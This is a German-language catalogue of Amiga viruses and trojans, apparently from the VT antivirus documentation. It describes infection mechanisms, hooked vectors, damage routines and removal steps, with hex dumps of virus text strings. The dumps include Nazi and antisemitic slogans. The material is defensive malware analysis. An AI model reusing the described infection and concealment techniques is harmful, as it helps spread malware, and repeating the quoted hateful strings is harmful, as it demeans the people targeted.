00f80a94 00f80a96 00f80a98 00f80a9a ................ 00c0: 0c794ef9 0007e066 670c42b9 000006a4 .yN....fg.B..... 00d0: 4ef900f8 08084ef9 0007e072 43617363 N.....N....rCasc 00e0: 0c794ef9 0007e06c 670c42b9 000006a4 .yN....lg.B..... 00f0: 4ef900f8 17044ef9 0007e078 61646521 N.....N....xade! b) Sobald eine Zaehlzelle den Wert $DEC und eine andere Zaehl- zelle den Wert #5 erreicht hat wird mit graphic.lib der Maus- zeiger in eine Penis-Darstellung umgewandelt. Dies hat bei mir nur mit KS1.3 funktioniert. Mit KS2.04 habe ich sofort den Guru gesehen. Siehe auch Firedom.BB Virus = Clone - CBM-Virus BB nur KS1.2 MicroSystems-Clone s.u. nur Text geaendert. 79726967 68746564 20627920 62696720 yrighted by big 205d830c 436f6d6d 6f646f72 65204147 ]..Commodore AG - CCCP-Virus Cool, im Prg. Vec3, DoIo, Openwindow, NewOpenLib !!!! Erstes VirusPrg. das sich als BB und als Link vermehren kann !! KS1.3 ja KS2.04 ja Mehrfachlinks: ja Defekte Files: ja (Hunkstruktur defekt nur loeschen moeglich) im BB sichtbar: CCCP VIRUS Link: verlaengert ein File um 1044 Bytes Befaellt keine Prg.e in l (z.B.libs), d (z.B.devs), f (z.B.fonts). Clone: STARCOM 1 Virus, IRAK3 siehe unten - CCCP-TAI6-Clone Text geaendert: 70004e75 542e412e 492e2053 49584df8 p.NuT.A.I. SIXM. - CED4-Trojan siehe bei CoP-Trojan - CENTURIONS anderer Name: THE SMILY CANCER siehe dort - Challenger trojanisches Pferd Keine Vektoren verbogen. Herkunft: FF622 challenger_d.main Laenge: 126336 Bytes Ablauf (vgl. Snoopdos): Sobald Sie das Spiel starten, wird ein Original-Setclock-Befehl (4884 Bytes) in SYS:devs/keymaps ange- legt und in a umbenannt. In c: wird ein neuer Setclock-Befehl angelegt: Laenge gepackt mit Imploder: 4884 (explode.lib) entpackt: 7344 Weiterhin wird in SYS:devs/keymaps noch ein File mit Namen rca angelegt: Laenge gepackt mit Imploder: 5328 (explode.lib) entpackt: 8388 Vermehrung: nur nach SYS: Der setclock-Befehl sollte in der startup-sequence stehen (ab KS2.04 NICHT mehr notwendig !!!). Deshalb rufen Sie bei jedem Boot-Vorgang auch diesen Befehl auf. Dies ist am 24. Juli eines Jahres gefaehrlich. An diesem Tag wird das File rca auch aufge- rufen. Es wird ein Text (schwarzer Hintergrund rote Schrift) ausgegeben und der Rechner blockiert. Guten Tag, hier ist der Guru Ihres Amiga-Computers. Laut Arbeitsvertrag habe ich das Recht auf einen Medita- tionstag pro Jahr. In meinem Fall ist das der 24. Juli jeden Jahres. Da wir heute dieses Datum schreiben, stehe ich Ihnen erst morgen wieder zur Verfügung. Bitte haben Sie Verständnis dafür, denn auch wir Gurus müssen einmal ausruhen. Es sind noch weitere Texte in rca vorhanden, aber die wurden bei mir nicht ausgegeben. Die Zerstoerung von Files wurde von mir nicht festgestellt. Empfehlung: entsprechende Files in c und keymaps loeschen und setclock von OrigWB-Disk neu nach c: kopieren. Arbeit mit VT: (getestet: 16.04.92) challenger_d.main wird geloescht c:setclock es wird ein rename mit devs/keymaps/a versucht. Falls nicht vorhanden, wird setclock allein geloescht. Sie muessen dann unter KS1.3 setclock von OrigWB-Disk neu kopieren devs/keymaps/rca wird geloescht. Hinweis Stand 16.06.94: BBS-Spiel GlobalWar Laenge 100136 Bytes In diesem Spiel wird im Moment von EINEM anderen AntiVirusProgramm das Challenger-Virus erkannt. Ich nehme an, dass diese Fehlerkennung beim naechsten Update dieses AntiVirusProgramms behoben sein wird. Richtig ist allerdings - Challenger-setmap entpackt (so kommt es aber im Original NICHT vor) - Challenger-rca entpackt (so kommt es aber im Original NICHT vor) - GlobalWar stimmen im ERSTEN Hunk bis auf Sprungbefehle sehr gut ueberein. Die Virustexte stehen aber bei Challenger im zweiten Hunk. GlobalWar sieht im Zweiten anders aus. Ob es sich beim ersten Hunk um eine veroeffentlichte Startup-Routine handelt, kann ich nicht beurteilen. Ich kann mir das aber nur so erklaeren, oder ????? - Chameleon-Virus BB siehe bei Little Sven - Chaos anderer Name: Taipan-Chaos Cool, DoIo BB codiert mit Wert aus $DFF006 Schaeden: Vermehrung mit BB sobald Zaehlzelle 8 erreicht hat: alle Blocks einer Disk werden mit unsinnigen Werten gefuellt, DisplayAlert: Chaos! by Tai-Pan usw. dann reset Herkunft: Virusinstall V2.0 - CHAOS-MASTER V0.5 File PP-Laenge: 12972, ungepackt:16676 CHAOS-MASTER V0.5 im ungepackten File lesbar Filename wahrscheinlich: dir KEINE bekannten Vektoren verbogen, nicht resetfest Schaeden und Vermehrung: - dir-Befehl wird manchmal nicht ausgefuehrt. Ein kleines Fenster erscheint: Error xyz, Return-Gadget die Zahl xyz kann auch negativ sein und entspricht NICHT dem DOS-Error-Code. - Sie geben ein: dir df3: Das Inhaltsverzeichnis von df3 wird ausgegeben und das Virus-File nach df3:c/dir kopiert. Ein bereits vorhandener Dir-Befehl wird ueberschrieben. - Sie geben ein: dir prefs Das Inhaltsverzeichnis von prefs wird ausgegeben und ein File disk.info (Laenge:370 Bytes) nach prefs kopiert. Dieses File enthaelt am Anfang die Icon-Struktur. Der groessere Teil der Struktur ist durch Text ueberschrieben. Folge: Sie klicken die Prefs-Schublade an, disk.info muesste als Icon darge- stellt werden, geht aber nicht, da Struktur nicht in Ordnung. Also stellt der Computer die Arbeit ein. Reset wird notwendig. Text in disk.info: Sorry an alle User usw. - Sie geben ein: c/dir df3: Inhaltsverzeichnis wird ausgegeben und das Virus-File nach df3:c/r (!!!! Programmierfehler) geschrieben. Empfehlung: dir-Befehl loeschen (VT) und von OrigWB neu kopieren. - Charlie Braun anderer Name: Hireling Protector V1.0 ForpibClone s.u. nur Text geaendert - CHEATER HIJACKER BB auch KS2.04 LameBlame-Clone s.u. DisplayAlert-Text geaendert: -+= CHEATER HIJACKER usw. Wird auch erzeugt von VIRUS TERMINATOR V6.0 s.u. - Check File PP-crunched Laenge:18644 Process: HardDisk.device in C-Aztek Schaeden: alle 5 Min (delay $3a98) Bild (Totenkopf) und Sound fuer kurze Zeit. KEINE Vermehrungsroutine gefunden Soll wohl ein Gag sein. Solche Gags mag ich nicht. Es KANN bei der Suche nach dem Prozess zu einer Falschaussage von VT kommen, falls ein Hardwarehersteller fuer einen Kon- troller ein Device mit obengenannten Namen herausbringt oder herausgebracht hat. In diesem Fall bitte ich um einen Hinweis. Danke !!! - CHRISTMAS VIOLATOR Link Soll einen zusaetzlichen 1.Hunk erzeugen. Verlaengert File um 1060 Bytes Verwendet aufs Byte genau die IRQ-Linkroutine Braucht ExecBase im Speicher ab $C00000 Cool immer $7E07a, im Prg. OldOpenLib immer $7FB88 Nur mit KS1.3, da absoluter ROM-Einsprung. Programm liegt zweigeteilt ab $7E000 und $7FB84 im Speicher. Der Linkvorgang konnte NICHT erreicht werden, da im Programm MEHRERE Fehler vorliegen. Immer GURU 3. VT-Empfehlung: loeschen Namensbegruendung: Ein Programmteil, das NIE erreicht wird, decodiert mit eori.b #$27,(a1)+ ergibt: 203e3e3e >>> 20434852 4953544d 41532056 494f4c41 CHRISTMAS VIOLA 544f5220 62792074 68652044 7265616d TOR by the Dream 20546561 6d202d20 28484520 4845293c Team - (HE HE)< 3c3c2020 48617665 2061206e 69636520 << Have a nice 6461792e 2e2e2000 day... - CIRCLE OF POWER siehe bei NComm32-Trojan - Claas Abraham andere Namen: Abraham, MCA Cold, Cool, KickTag, KickCheckSum, $68 braucht FastRam !!!!! Angefordert mit #$4,d1 und AllocMem (Programmierfehler ????) im Prg.Ablauf erst BeginIo Vermehrung: ueber BB Schaden: nach $F-Resets Formatierung Eor-Byte wird fuer neuen BB aus $DFF006 erzeugt entschluesselt steht im Speicher: >>> Claas Abraham Virus !!! <<< Hinweis: Ein Kopier-Prg. erkennt den ORIGINAL-Turrican3-BB als Claas-Abraham-BB-Virus. Ich gehe davon aus, dass im naechsten Update die Fehlerkennung behoben ist. - Clist-Virus anderer Name: U.K.LamerStyle Begin, Kicktag, KickCheckSum entschluesselt steht im Speicher: expansion ram.trackdisk.device..clist.library.clist 33.80 (8 Oct 1986). Vermehrung: ueber BB Ein neuer BB wird wieder verschluesselt mit eori.b. Das Ver- schluesselungsByte wird mit $DFF006 festgelegt. Speicher fuer VirusHauptPrg wird ueber StructMemList besorgt und !!!! mit allocabs eingetragen. - CLP-Trojan File Laenge ungepackt: 51000-52000 Bytes siehe auch bei UA62-ACP-Trojan, PHA Trojan Soll in CLP_WOW.exe sein. Wer das File hat, moege es mir BITTE zuschicken. Danke Ich habe KEIN lauffaehiges Virusfile. Nur GURU auf allen Maschinen und jeder KS . Keine verbogenen Vektoren. Keine Vermehrung Namensbegruendung: siehe Auszug Schaden: Soll in alle Files in S: einen Text schreiben. 62726172 7900533a 0049736e 27742043 brary.S:.Isn't C 55544520 4c495454 4c452050 4f4e4e49 UTE LITTLE PONNI 4553206a 75737420 61206e69 63652067 ES just a nice g 726f7570 213f2e2e 2e206861 68616861 roup!?... hahaha ;usw Clone: Anim_demo.exe Laenge: 1795068 Bytes !!!! gefunden in: kef_ani.lha Laenge: 179143 Bytes Es handelt sich NICHT um ein Intro, sondern am Ende steht 2x das CygnusEd Prof. 3.5 Prg. Es wurden 2 4EB9-4EF9-Links verwendet, um ein CLP-Teil anzu- haengen. Unterschiede: a) es soll nicht nach s: sondern nach BBS: gesucht werden. b) es wird der dR. WHo Text (s.u. bei UA62) verwendet. VT erkennt: CLP-Virus ??? VT bietet nur loeschen an. Begruendung: Das Teil ist NICHT lauffaehig. Der Source-Code von CLP-Trojan ist durch die Netze gewandert. Verstehe ich nicht so ganz. Dieser Source hatte MEHRERE Fehler. Genau die gleichen Fehler tauchen auch in diesem Prg auf. Bessert man die Fehler nach, so koennte Anim_demo.exe bei ge- nuegend Speicher und vorhandener BBS: Schaden anrichten. Die Groesse des Files ist in der Speicherreservierung fuer den Scan von BBS: begruendet. - CLP-Virus Clone2 Laenge ungepackt: 51256 anderer Name: MST-VEC Virus, MST-Inte Virus Dieses Teil ist lauffaehig !!!!!!!!!! Keine verbogenen Vektoren Das File ist an Nichts angelinkt. Mir also unverstaendlich warum jemand das freiwillig aufrufen sollte ??? Schreibt in alle Files in s: einen Text PCD_ueberschrieben: 4655434b 20424f42 4f20414e 44204a45 FUCK BOBO AND JE 57495348 20415845 21205349 45472048 WISH AXE! SIEG H 45494c21 20474153 20524f4f 4c455a21 EIL! GAS ROOLEZ! 20424545 45415645 5253210a 61737369 BEEEAVERS!.assi 676e2066 726f6d3c 24243e3a 206f6672 gn from<$$>: ofr 6f6d3c24 243e3a0a 61737369 676e206f om<$$>:.assign o VT bietet fuer das trojanische Pferd und fuer die ueberschriebenen Files loeschen an. - COBRA-Virus BB Fastmem: Nein KS2.04: Nein BeginIo, KickTag, KickCheckSum, Exec IntVec 5 Namensbegruendung: 4E714E71 4E752043 4F425241 20484157 NqNqNu COBRA HAW 20484157 20484157 200041FA 002C3010 HAW HAW .Au'.,0. Schaeden und Vermehrung: BB VT kennt: 15.10.92 - CODER anderer Name: Coders Nightmare immer $7f600, DoIo, KickTag, KickCheckSum, $68 Fordert trackdisk.device NICHT im BB steht unverschluesselt: Bootblock installed with 'CODER' - The Ultimate Viruskiller!! Vermehrung: ueber BB im Speicher steht (entschluesselt mit ror.b #2,d1): Something WONDERFUL has happened!! Your Amiga is alive, and it is infected with the 'Coders Nightmare Virus'. - The ultimate key-killer, masterminded by the megamighty Mr. N of The Power Bomb Systems!! - Coders Nightmare anderer Name: CODER s.o. - COHEN-Virus BB HODEN-Virus-Clone s.u. Spritedaten geaendert. Verwendet NICHT mehr absoluten KS1.2 DoIo . Code teilweise um vier Bytes verschoben. Fordert trackdisk.device NICHT. Text im BB geaendert: 46726564 20436f68 656e202d 20556e69 Fred Cohen - Uni 76657273 69747920 536f7574 6865726e versity Southern 2043616c 69666f72 6e696120 31393839 California 1989 - Color Filevirus Laenge: 2196Bytes DoIo immer $70000, Cool belegt sinnlos 102400 Bytes ChipMem, taeuscht durch ein Graphik-Demo, schwarzer Hintergrund und drei Balken (rot, gruen, blau) und installiert gleichzeitig ab 70000 das Virusprogramm und ab 7F000 den Virus-BB (TURK). Veraendert die startup-s. NICHT. Schaeden: Bei DoIo-Einsprung wird der Virus-BB geschrieben. Bei Cool-Einsprung wird $5000 x TURK in den Speicher geschrieben. - COMMANDER-Virus Link Verlaengert ein File um 1664 Bytes KS1.3: ja Das Virusteil ist codiert in Abhaengigkeit von $DFF006 und $DFF007 . Textteile sind zweimal codiert, damit die Erkennung mit einem Speichermonitor erschwert wird. Das Teil meldet sich nicht. 2x decodiert ist im Speicher zu lesen: 434f4d4d 414e4445 5220293e 2d206279 COMMANDER )>- by 20427261 214e2042 6c615354 65722069 Bra!N BlaSTer i 6e203139 39340000 4448303a 432f4c6f n 1994..DH0:C/Lo 61645742 00004448 3000646f 732e6c69 adWB..DH0.dos.li 62726172 79007265 71746f6f 6c732e6c brary.reqtools.l 69627261 72792072 6571746f 6f6c7320 ibrary reqtools 33382e38 38380000 a0000000 00150000 38.888.......... Verbogene Vektoren 1: ExNext, Examine Aufgabe: Beide verbogenen Vektoren sollen die Erkennung des Virusteils ueber die Fileinfostruktur verhindern. Die Filelaenge und die Blockanzahl wird verringert. Das $A0 aus den SetComment-Bereich geloescht. Verbogene Vektoren 2: Open, Rename, Lock, LoadSeg, SetComment, Setprotection. Aufgabe: Sprung zur Linkroutine Ablauf im Speicher : Beim Einbau im Speicher wird zuerst ueber setcomment getestet, ob das Teil schon aktiv ist ($7419F1A2). Falls nein, wird nach einem Task DH0 gesucht. Falls gefunden, Suche nach DH0:C/LoadWB und verseuche. Dies er- klaert, warum auf verseuchten Festplatten meist auch LoadWB betroffen ist. Ablauf des Link-Vorgangs : Test ob : - File schon verseucht ($7419F1A2) - Filename beginnt nicht mit v oder V - Disk validated - File ist ausfuehrbar $3F3 - $3E9 wird gefunden - 1. Hunk ist nicht laenger als $1E00x4=$7800=#30720 Das Teil wird hinter den 1.Hunk gelinkt. Um den Einsprung in den Linkteil sicherzustellen, wird im Original- Hunk nach einer Bytefolge gesucht. Gesucht wird nach: $4EAE = jsr xy(a6) (es muss NICHT openlib sein) oder $6100 = bsr Diese Stelle wird ersetzt durch: $4EBAuvwx = jsr Virusbeginn. VT versucht den Original-Filezustand wieder herzustellen. Arbeiten Sie bitte mit einer Kopie. Wenn mehrere Files auf der Disk ver- seucht waren, empfehle ich ihnen eine Disk LANG zu formatieren und alle Files auf diese Disk zu kopieren. Die Disk-Struktur wird da- durch wieder geordnet. Die Disk wird schneller. VT versucht das Teil im Speicher zu erkennen. Bitte ueberlegen Sie unter KS1.3 ob nicht ein KReset sinnvoll waere. HINWEIS: !!!!!!!!!! Wenn Sie bei diesem Virusteil sogenannte "NutzPrge" mitlaufen lassen, die auch obengenannte Vektoren verbiegen, so finden Sie das Virusteil NIE !!!!!!!!!! Nachtrag 26.10.94: Es ist ein File "Kill" aufgetaucht. Laenge ungepackt: 2252 Bytes Dieses Prg soll den COMMANDER loeschen. Leider enthaelt dieses Prg einen KOMPLETTEN und LAUFFAEHIGEN (!!!!!) COMMANDER-Virusteil ab $1F0 im File. Dringende Empfehlung: sofort loeschen !!!! Nachtrag 25.11.94: Es ist ein neues File aufgetaucht: DENISTRO.EXE Laenge mit Text-Hunks und Commander-Virus 71800 Bytes Laenge ALLES ausgebaut 64844 Bytes Aeltere VT (z.B. VT2.68) haben das Teil aber schon mit Block- KetteTest gefunden. Wichtig: Der Commander-Teil hat sich NICHT ueber die Text-Hunks hinweggelinkt, sondern die Text-Hunks wurden DANACH angehaengt. VT2.69 meldet "Text-Hunk am Anfang" und bietet Ausbau an. In diesem Fall werden die Text-Hunks UND der Commander-Teil in einem Durchgang ausgebaut. Dies ist ein Sonderfall, da ja das File bekannt ist. Im Normalfall MUESSEN Sie nach dem Text-Hunk- Ausbau IMMER einen zweiten FileTest starten. Lesen Sie bitte bei Text-Hunk am Anfang nach. Danke Hinweis 01.95: Es gibt im Moment ein Antivirusprogramm, das die $6100-Variante erkennt und ausbaut. Leider ist der Ausbau FALSCH, da $4EAE zurueckgeschrieben wird anstatt $6100 . Die Lauffaehigkeit des Programms duerfen Sie NICHT erwarten. Hinweis: Das Virusteil haengt sich auch an Fonts (vgl. Helvetica 9), wenn die gesuchte Byteabfolge gefunden wird. Die Font-Struktur ist dann natuerlich unbrauchbar und das Teil kann sich ueber diesen Font NICHT vermehren. Versuchen Sie bitte einen Ausbau. Hinweis: Unter gewissen mir unbekannten Umstaenden soll sich das Virusteil auch an Files linken, deren 1.Hunk viel zu lang ist. Diese ver- seuchten Files sind dann NICHT lauffaehig, da ja der Sprungbefehl falsch ist. Ich mache Ihnen nicht viel Hoffnung, wenn das Virus- teil abgetrennt ist. Wenn Sie Erfahrung haben, koennen Sie mit einem Filemonitor nach 4ebauvwx suchen und dann probieren. Ob sich das lohnt ??? - Commander-cod. (codiert) Fundort z.B.: CD-HOTTEST5/PDSOFT/LIBRARY/DMS/DISK4241.DMS Es handelt sich um ein Demo, das aus zwei Disketten besteht. Textauszug: -+* My Mama Is a Vampire *+- ÐµP£Ø PrØdUçtIønS 1994 Version 3.0 Release date: 30 October 1994 ;..... Vicious of Duplo Gefaehrlich ist das File vampire.exe (L:875778) von Disk 1. Sicherheitshalber sollten Sie beide Disks formatieren (LANG!!) Die Hunk-Struktur des Files war mir bis jetzt unbekannt. Am Fileende fehlt die 3F2-Kennung. Fileauszug: 074f7665 726c6179 48e77ffe 267affe2 .OverlayH..&z.. ;...... 2d2d2d2d 2d2d0a0a 0d4e6f74 20656e6f ------...Not eno 75676820 6d656d6f 72792074 6f207374 ugh memory to st 61727420 564f532d 5368656c 6c212050 art VOS-Shell! P 726f6772 616d2074 65726d69 6e617465 rogram terminate ;usw. Falls Sie so etwas bei anderen Files mit dem Filemonitor sehen, sollten Sie SEHR vorsichtig werden. Die Gruppe Duplo scheint ihre Systeme NICHT virenfrei halten zu koen- nen. Dies zeigt sich am Vampire-Vorfall. Loeschen Sie der- artige Files. Sicher ist sicher !!!!! Das File besteht aus mehreren Einzelfiles, die nacheinander aktiviert werden. Die Einzelfiles sind mit -eori.b- codiert. Deshalb wurde der Commander-Virus beim Filetest und beim BlockKetteTest nicht entdeckt. In diesem File ist der Commander-Virus NUR 7x enthalten. Bil- den Sie sich Ihre eigene Meinung von der Gruppe Duplo !!! Im File 1x bei $C502.... 7x bei $CF508. Wenn Sie das selbst nachvollziehen wollen, nehmen Sie bitte nicht das Langwort bei $C502, sondern das Langwort bei $C506 zum Suchen mit einem Filemonitor. VT bietet nur Loeschen an. Wichtiger Hinweis !!!!! Auf einem A2000 mit 68030 kommt ein GURU . (AGA fehlt) ABER !!!!!! Vorher wurde schon DH0:c/loadwb verseucht !!!! Nach einem RESET wurde die Platte validiert UND danach das Virusteil dank loadwb sofort aktiviert !!!! - Commodore-Virus File Laenge:1752 reines Zerstoerungsprogramm KEINE Vermehrung, also nach Definition kein Virus. Unter welchem Namen das Programm weitergegeben wird, ist mir nicht bekannt. Als VirusTestPrg ???? siehe unten . NICHT resetfest. Namensbegruendung: 20210054 68697320 69732074 6865206E !.This is the n 65772043 6F6D6D6F 646F7265 2D566972 ew Commodore-Vir 75732021 00425920 53544152 4C494748 us !.BY STARLIGH 5420454E 54455250 52495345 53203139 T ENTERPRISES 19 39320000 92 Verbiegt Cool auf eigenen Programmtext (Schwachsinn), also voellig unsinnig. Da ausserdem allocmem nicht benutzt wird, wird nach Programmende der Speicher von einem beliebigen anderen Programm benutzt, d.h. der Cool-Vektor zeigt auf irgendetwas, nur nicht auf den gewuenschten Text, weil dieser ja laengst ueberschrieben ist. VT erkennt beim Cool-Vektor-Test deshalb nur unbe- kanntes Programm. Gehen Sie Weiter und loeschen Sie den Vektor in VT/Tools. Danke Legt eine Zaehlzelle bei $66666 an, OHNE allocmem. Schreibt auch einen anderen Wert ins RangerRAM ($C0). Da auch der Text "dos.library" 3x im Programm vorkommt und aufgerufen wird, draengt sich der Verdacht auf, dass ein Anfaenger 3 Assemblerkursteile zusammengesetzt hat. Abhaengig von Zaehlzelle: DisplayAllert: (Zelle=2) 00961420 20204968 7220436F 6D707574 ... Ihr Comput 65722069 737420DC 62657268 69747A74 er ist überhitzt 20212121 0001007D 2D57656E 6E206573 !!!...}-Wenn es 206E6163 68206465 6D205265 73657420 nach dem Reset 65696E20 61627374 75727A20 67696274 ein absturz gibt 000100AA 46202053 4348414C 54454E20 ...S SCHALTEN 49484E20 53494520 42495454 45204155 IHN SIE BITTE AU 53000100 D7552020 20436F6D 6D6F646F S...xU Commodo 72652031 39383700 re 1987. oder Textausgabe: (Zelle=3) 0000636F 6E3A3130 2F31302F 3333302F ..con:10/10/330/ 35302F52 45515545 53542000 9B316D9B 50/REQUEST ..1m. 33336D20 4B45494E 20564952 55532049 33m KEIN VIRUS I 4E204452 49564520 4446303A 20200A20 N DRIVE DF0: . 20202020 20204745 46554E44 454E2021 GEFUNDEN ! 21202020 ! Schaeden: - loescht startup-sequence - schreibt leeres Unterverzeichnis Name: Commodore war hier !! Erkennung im Speicher mit VT: nicht moeglich (siehe oben) File-Erkennung mit VT getestet: 26.09.92 Empfehlung: einfach loeschen und gegebenenfalls in s-sequence nachschauen, ob geloeschter Programmname dort auftaucht. Dann bitte diese Zeile mit ED loeschen. - CompuPhagozyte File Laenge ungepackt: 1452 keine Vektoren verbogen sichtbar z.B.: The CompuPhagozyte usw. Erstellt eine Fensterleiste mit dem Text: Virus-Checker V4.0 by ... (Name) Verraet sich, wenn Sie die Fensterleiste anklicken, weil im Gegensatz zum echten Virus-Checker NICHTS passiert. Wartet auf CloseWindow und DiskInserted. Schaeden: Solange die Fensterleiste da ist, wird bei jeder neu eingelegten nicht schreibgeschuetzten Disk mit c/Virus-Checker bei mir das Orig-Prg auf 1452 Bytes gekuerzt. (also keine Vermehrung) Empfehlung: loeschen und Orig-Virus-Checker neu aufspielen. - CompuPhagozyte 2 File Laenge ungepackt: 1148 keine Vektoren verbogen sichtbar z.B.: The CompuPhagozyte usw. Erstellt eine Fensterleiste mit dem Text: VirusX 5.00 by ... (Name) Verraet sich, wenn Sie die Fensterleiste anklicken, weil im Gegensatz zum echten VirusX NICHTS passiert. Wartet auf Close- Window und DiskInserted. Schaeden: Solange die Fensterleiste da ist, wird bei jeder neu eingelegten nicht schreibgeschuetzten Disk mit c/VirusX bei mir das Orig-Prg auf 1148 Bytes gekuerzt. (also keine Vermehrung) Empfehlung: loeschen und Orig-VirusX 4.01 neu aufspielen. 6e2e6c69 62726172 79003a63 2f566972 n.library.:c/Vir 75735800 3a632f56 69727573 58005468 usX.:c/VirusX.Th 6520436f 6d707550 6861676f 7a797465 e CompuPhagozyte 20686173 20617474 61636865 6420746f has attached to 20796f75 72207379 7374656d 20210a57 your system !.W 61697420 666f7220 206e6577 20766972 ait for new vir 75732069 6e206f74 68657220 636f6d70 us in other comp 75746572 2d737973 74656d73 20210a20 uter-systems !. 54686520 436f6d70 75506861 676f7a79 The CompuPhagozy 74652069 6e20392e 39312062 79205468 te in 9.91 by Th 6520456d 7065726f 72204f66 20547269 e Emperor Of Tri 6c6c696f 6e202042 79746573 20210000 llion Bytes !.. 56697275 73582035 2e303020 62792053 VirusX 5.00 by S 74657665 20546962 62657474 00000000 teve Tibbett.... Es ist ein Clone aufgetaucht, wobei nur die Texte geaendert wurden. Wieder ein Beispiel fuer geistigen Tiefflug !!! Zu mehr reicht es halt nicht. Geht im Sandkasten spielen, da koennt Ihr Euch niveaumaessig angemessen ausleben !!! Wird weiterhin als CompuPhagozyte 2 erkannt. 79003a63 2f566972 75735a00 0007c000 y.:c/VirusZ..... ;..... 4e6f2076 6563746f 72732063 616e2063 No vectors can c 68616e67 65642061 6e796d6f 72652073 hanged anymore s 6f20796f 75722063 6f6d7075 74657220 o your computer 69732073 61666520 21202120 21200000 is safe ! ! ! .. 56697275 735a2049 4920312e 30322047 VirusZ II 1.02 G 656f7267 2048f672 6d616e6e 00000000 eorg H.rmann.... - CompuPhagozyte 3 File bekannte Filelaengen: 568 Bytes 592 Bytes Die verschiedenen Filelaengen muessen von Hand erzeugt sein, da ein entsprechender Code im Prg nicht vorkommt. Cool immer $7C000 Wahrscheinlich als cls-Befehl getarnt, da mit mehreren " ",0a das Shell-Fenster geloescht wird. fuer mich KEIN Virus, Routine veraltet, KEINE Vermehrung im Prg zu lesen: 200A5468 6520434F 4D505550 6861676F .The COMPUPhago 7A797465 20696E20 392E3931 20212121 zyte in 9.91 !!! 0A546865 20456D70 65726F72 204F6620 .The Emperor Of 5472696C 6C696F6E 20427974 65732073 Trillion Bytes s 7472696B 65732062 61636B20 21210A1F trikes back !!.. Legt ab $7C000 ein kleines Prg ab, das durch cool resetfest sein soll (geht z.B nicht mit 1Mb). Dieses Prg loescht Cold, Warm, KickMem, KickTag, KickCheckSum. KS2.04 : GURU A nach Reset Empfehlung: File loeschen Erkennung im Speicher mit VT: ja Fileerkennung mit VT : 08.10.92 - Compu3-TAI11 Clone: File Laenge 592 Namensbegruendung: 20542041 20492020 31312020 202e2e2e T A I 11 ... - CompuPhagozyte 4 File bekannte Filelaengen : 916 Bytes : 952 Bytes Die verschiedenen Filelaengen muessen von Hand erzeugt sein, da ein entsprechender Code im Prg nicht vorkommt. Cool immer $7C600 , OldOpenLib immer $7E000 Reserviert mit AllocAbs 3 Speicherbereiche: $7C000 ganzes VirusPrg $7C600 CoolRoutine fuer RESET $7E000 OldOpenLibRoutine fuer Vermehrung df0:A0A0A0A0 (unsichtbar in Root) df0:s/startup-sequence A0A0A0A0 COMPUPhagozyte !!! am Fileende zu lesen (s.u.) Testet OldOpenLib auf $FC1430 = KS 1.2 , falls nein wird neue OldOpenLib-Vektor-Routine NICHT kopiert. D.h. eine Vermehrung ist nicht moeglich. Wegen der Vorgabe (s.o.) ist nur eine Ver- mehrung in DF0 moeglich. Am Anfang des Files steht KEIN Text "Compu...". KS2.04 : Nach Tastatur-Reset Uebergang in Dauer-Reset. Typ C 4: e1ce0007 e1d04446 303aa0a0 a0a00000 ......DF0:...... 4446303a 732f7374 61727475 702d7365 DF0:s/startup-se 7175656e 63650000 a0a0a0a0 0a200a54 quence....... .T 6865206d 69676874 206f6620 54686520 he might of The 456d7065 726f7220 69732075 6e6c696d Emperor is unlim 69746564 20212121 0a200a43 4f4d5055 ited !!!. .COMPU 50686167 6f7a7974 65202121 210a0000 Phagozyte !!!... Hinweis: Es ist ein CompuPhagozyte-Clone aufgetaucht. Filename: VT-Faster. So ein Programm habe ich nie geschrieben. Laenge gepackt: 860 Bytes Laenge ungepackt: 916 Bytes Nur Text geaendert und Vermehrung jetzt auf HD0. Das File wird jetzt in c als VT abgelegt. Falls Sie da einen Original- VT (so heisst aber mein File NICHT) liegen haetten, wuerde das File zerstoert. e1ce0007 e1d04844 303a632f 56540000 ......HD0:c/VT.. 4844303a 732f7374 61727475 702d7365 HD0:s/startup-se 7175656e 63650000 632f5654 0a200a55 quence..c/VT. .U ;..... 6520776f 726c6421 0a200a4d 6178206f e world!. .Max o 66205374 61726c69 67687420 210a0000 f Starlight !... - CompuPhagozyte 5 File bekannte Filelaengen: 892 Bytes 900 Bytes 936 Bytes (1.Hunk $CF) 936 Bytes (1.Hunk $CD) Die verschiedenen Filelaengen muessen von Hand erzeugt sein, da ein entsprechender Code im Prg nicht vorkommt. Cool immer $7C600 , OldOpenLib immer $7E000 Reserviert mit AllocAbs 3 Speicherbereiche: $7C000 ganzes VirusPrg $7C600 CoolRoutine fuer RESET $7E000 OldOpenLibRoutine fuer Vermehrung :A0A0A0A0 (unsichtbar in Root) :s/startup-sequence Also keine Festlegung auf DF0 mehr. COMPUPhagozyte jetzt auch am Fileanfang zu lesen: 434f4d50 55506861 COMPUPha 676f7a79 74650a00 gozyte.. Neu: KEIN Test auf OldOpenLib = $FC1430 = KS 1.2 mehr. KS2.04 : Nach Tastatur-Reset Uebergang in Dauer-Reset. Vermehrung: Falls ein anderes Prg die oldopenlib-Routine aufruft, wird eine Vermehrung versucht. Kein Schreibschutztest vorher. Speicher ab $7C000 soll als A0A0A0A0-File auf Disk geschrieben werden. Danach wird die startup-sequence geaendert. Empfehlung: sofort loeschen und auch startup-sequence ueber- pruefen. Typ 5: 00000000 00000000 00000000 00003aa0 ..............:. a0a0a000 3a732f73 74617274 75702d73 ....:s/startup-s 65717565 6e636500 a0a0a0a0 0a200a54 equence...... .T 6865206d 69676874 206f6620 54686520 he might of The 456d7065 726f7220 69732075 6e6c696d Emperor is unlim 69746564 20212121 0a200a00 000003ec ited !!!. ...... - CompuPhagozyte 6 File bekannte Filelaengen: 1008 Bytes 1048 Bytes Die verschiedenen Filelaengen muessen von Hand erzeugt sein, da ein entsprechender Code im Prg nicht vorkommt. :A0A0A0A0 (unsichtbar in Root) :s/startup-sequence A0A0A0A0 immer ab $7C000 Verbogene Vektoren: Cool, OldOpenLib, NEU: jetzt wird auch SumKickData verbogen. Im File am Anfang jetzt erweiterter Text: 3e434f4d 50555068 >COMPUPh 61676f7a 79746520 50726f74 65637469 agozyte Protecti 6f6e2046 696c6520 on File Sie muessen auch die s.-seq. mit einem Editor bearbeiten. VT kennt File und Speicher: 24.11.92 - CompuPhagozyte 7 Link Speicher immer ab $7C000, Cool, OldOpenLib, SumKickData, DoIo, $6c, Open, Lock, LoadSeg, Rename KS1.3 ja KS2.04: nach Aktivierung des Teils und Aufruf eines anderen Programms, das ebenfalls einen obengenannten Dos-Vektor benutzt, bei mir immer Absturz. Soll sich ans Ende des 1.Hunks schreiben. Sucht nach $4E75 (RTS) und ersetzt durch $4E71 (NOP). 